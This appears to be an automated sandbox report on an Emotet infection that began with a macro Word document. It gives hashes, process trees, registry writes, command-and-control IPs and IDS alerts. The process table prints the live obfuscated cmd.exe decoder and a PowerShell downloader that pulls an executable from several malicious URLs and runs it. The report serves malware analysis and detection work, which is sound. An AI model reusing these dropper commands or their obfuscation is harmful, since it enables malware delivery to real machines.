| URL: | http://tortugadatacorp.com/En_us/Clients/122018 |
| Full analysis: | https://app.any.run/tasks/b8d0aee8-2392-4229-932e-58ce23eeae97 |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | December 14, 2018, 19:54:54 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MD5: | AB49FBA744FFED799648287039F55A52 |
| SHA1: | 4141BB30C3A5ABD9FBEED79E4A07B5A78D3B07AD |
| SHA256: | 74F4B7AB9D6FEEB49B5573CC3002805077EEAA7BF0ADADB819ED9629B7CE4EEA |
| SSDEEP: | 3:N1KKKB/F7ODrzWKUXSn:CKQ/VODrhUC |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 3420)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3420)
Executes PowerShell scripts
- cmd.exe (PID: 2300)
Request from PowerShell which ran from CMD.EXE
- powershell.exe (PID: 3832)
Application was dropped or rewritten from another process
- 749.exe (PID: 2328)
- archivesymbol.exe (PID: 912)
- 749.exe (PID: 1740)
- archivesymbol.exe (PID: 2072)
Connects to CnC server
- archivesymbol.exe (PID: 912)
EMOTET was detected
- archivesymbol.exe (PID: 912)
Changes the autorun value in the registry
- archivesymbol.exe (PID: 912)
Downloads executable files from the Internet
- powershell.exe (PID: 3832)
SUSPICIOUS
Application launched itself
- WINWORD.EXE (PID: 3420)
- cmd.exe (PID: 1928)
- cmd.exe (PID: 3368)
- cmd.exe (PID: 2300)
- 749.exe (PID: 2328)
- archivesymbol.exe (PID: 2072)
Starts Microsoft Office Application
- WINWORD.EXE (PID: 3420)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 3368)
- cmd.exe (PID: 1928)
- cmd.exe (PID: 2300)
- cmd.exe (PID: 2724)
Creates files in the user directory
- powershell.exe (PID: 3832)
Executable content was dropped or overwritten
- powershell.exe (PID: 3832)
- 749.exe (PID: 1740)
Starts itself from another location
- 749.exe (PID: 1740)
Connects to unusual port
- archivesymbol.exe (PID: 912)
Connects to SMTP port
- archivesymbol.exe (PID: 912)
INFO
Application launched itself
- chrome.exe (PID: 2956)
Reads Internet Cache Settings
- chrome.exe (PID: 2956)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3420)
- WINWORD.EXE (PID: 3192)
Creates files in the user directory
- WINWORD.EXE (PID: 3420)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
56
Monitored processes
24
Malicious processes
9
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 912 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1328 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=976,2483152675597224098,10037370310120290366,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=1FAC90B25512B23239E11864D30D18B8 --mojo-platform-channel-handle=1016 --ignored=" --type=renderer " /prefetch:2 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google Inc. Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 Modules
| |||||||||||||||
| 1740 | "C:\Users\admin\AppData\Local\Temp\749.exe" | C:\Users\admin\AppData\Local\Temp\749.exe | 749.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1928 | CmD /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2072 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 749.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2176 | C:\Windows\system32\cmd.exe /S /D /c" echo $KSY='QwR';$aLC=new-object Net.WebClient;$cwQ='http://evihdaf.com/syXxoBHdX@http://pingwersen.com/iZTVle9fY@http://ibgd.org/v3uTuE3@http://tevetogluyemek.com.tr/svnkBH2N@http://inwa.net/rUGhAv6jC'.Split('@');$HIT='iSC';$hPl = '749';$IbN='iUO';$sba=$env:temp+'\'+$hPl+'.exe';foreach($jkO in $cwQ){try{$aLC.DownloadFile($jkO, $sba);$CWs='Gzp';If ((Get-Item $sba).length -ge 80000) {Invoke-Item $sba;$BuH='cjf';break;}}catch{}}$CVY='GjZ';" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2300 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^|findstr Cons') DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2328 | "C:\Users\admin\AppData\Local\Temp\749.exe" | C:\Users\admin\AppData\Local\Temp\749.exe | — | powershell.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2528 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=976,2483152675597224098,10037370310120290366,131072 --enable-features=PasswordImport --service-pipe-token=71810659047A3BFA6270B183881673F7 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=71810659047A3BFA6270B183881673F7 --renderer-client-id=4 --mojo-platform-channel-handle=1904 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google Inc. Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 Modules
| |||||||||||||||
| 2724 | C:\Windows\system32\cmd.exe /c ftype|findstr Cons | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
Total events
3 130
Read events
2 564
Write events
551
Delete events
15
Modification events
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 0 | |||
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon |
| Operation: | write | Name: | state |
Value: 2 | |||
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon |
| Operation: | write | Name: | state |
Value: 1 | |||
| (PID) Process: | (2916) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes |
| Operation: | write | Name: | 2956-13189290915045750 |
Value: 259 | |||
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96} |
| Operation: | write | Name: | dr |
Value: 1 | |||
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome |
| Operation: | write | Name: | UsageStatsInSample |
Value: 0 | |||
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes |
| Operation: | delete value | Name: | 3516-13180984670829101 |
Value: 0 | |||
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96} |
| Operation: | write | Name: | usagestats |
Value: 0 | |||
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes |
| Operation: | delete value | Name: | 2956-13189290915045750 |
Value: 259 | |||
| (PID) Process: | (2956) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96} |
| Operation: | write | Name: | metricsid |
Value: | |||
Executable files
2
Suspicious files
24
Text files
66
Unknown types
8
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2956 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\7deb4aec-cc8f-403c-9785-cbc5c113f0af.tmp | — | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp | — | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp | — | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Version | text | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old | text | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\a8895a8e-75a7-4e88-a6f1-1df772c5acb4.tmp | — | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF198d23.TMP | text | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old | text | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\Downloads\d8bbf0d5-375e-42f2-be4a-a4c7751dc62a.tmp | — | |
MD5:— | SHA256:— | |||
| 2956 | chrome.exe | C:\Users\admin\Downloads\FORM-8006817.doc.crdownload | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
142
DNS requests
117
Threats
26
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
912 | archivesymbol.exe | GET | — | 190.146.201.54:80 | http://190.146.201.54/ | CO | — | — | malicious |
912 | archivesymbol.exe | GET | — | 190.152.12.86:80 | http://190.152.12.86/ | EC | — | — | malicious |
912 | archivesymbol.exe | GET | — | 152.168.60.9:80 | http://152.168.60.9/ | AR | — | — | malicious |
3832 | powershell.exe | GET | 301 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX | US | html | 237 b | malicious |
912 | archivesymbol.exe | GET | 200 | 190.189.179.140:8080 | http://190.189.179.140:8080/whoami.php | AR | text | 12 b | malicious |
2956 | chrome.exe | GET | 200 | 103.231.77.68:80 | http://tortugadatacorp.com/En_us/Clients/122018/ | IN | document | 52.7 Kb | malicious |
3832 | powershell.exe | GET | 200 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX/ | US | executable | 156 Kb | malicious |
912 | archivesymbol.exe | GET | 200 | 190.189.179.140:8080 | http://190.189.179.140:8080/ | AR | binary | 5.08 Kb | malicious |
2956 | chrome.exe | GET | 301 | 103.231.77.68:80 | http://tortugadatacorp.com/En_us/Clients/122018 | IN | html | 256 b | malicious |
912 | archivesymbol.exe | GET | 200 | 110.37.219.134:990 | http://110.37.219.134:990/ | PK | binary | 148 b | suspicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
912 | archivesymbol.exe | 190.152.12.86:80 | — | CORPORACION NACIONAL DE TELECOMUNICACIONES - CNT EP | EC | malicious |
912 | archivesymbol.exe | 152.168.60.9:80 | — | CABLEVISION S.A. | AR | malicious |
912 | archivesymbol.exe | 110.37.219.134:990 | — | National WiMAX/IMS environment | PK | suspicious |
912 | archivesymbol.exe | 190.189.179.140:8080 | — | Prima S.A. | AR | malicious |
912 | archivesymbol.exe | 188.125.73.26:465 | smtp.mail.yahoo.com | — | CH | unknown |
912 | archivesymbol.exe | 174.136.30.150:465 | mail.inttegrain.com.mx | Colo4, LLC | US | unknown |
912 | archivesymbol.exe | 188.125.73.26:587 | smtp.mail.yahoo.com | — | CH | unknown |
912 | archivesymbol.exe | 118.143.11.136:465 | smtp.hkcts.com | Hutchison Global Communications | HK | unknown |
912 | archivesymbol.exe | 62.149.157.55:25 | mail.aruba.it | Aruba S.p.A. | IT | unknown |
912 | archivesymbol.exe | 179.61.13.76:25 | mail.ventastecnicas.cl | HIVELOCITY VENTURES CORP | CL | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
clientservices.googleapis.com |
| whitelisted |
tortugadatacorp.com |
| malicious |
www.gstatic.com |
| whitelisted |
accounts.google.com |
| shared |
ssl.gstatic.com |
| whitelisted |
dns.msftncsi.com |
| shared |
clients2.google.com |
| whitelisted |
evihdaf.com |
| malicious |
clients1.google.com |
| whitelisted |
mx.del-ser.com.ar |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2956 | chrome.exe | Potentially Bad Traffic | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) |
2956 | chrome.exe | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript |
2956 | chrome.exe | Potential Corporate Privacy Violation | ET POLICY Office Document Download Containing AutoOpen Macro |
2956 | chrome.exe | Attempted User Privilege Gain | SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt |
3832 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3832 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3832 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3832 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3832 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
912 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
5 ETPRO signatures available at the full report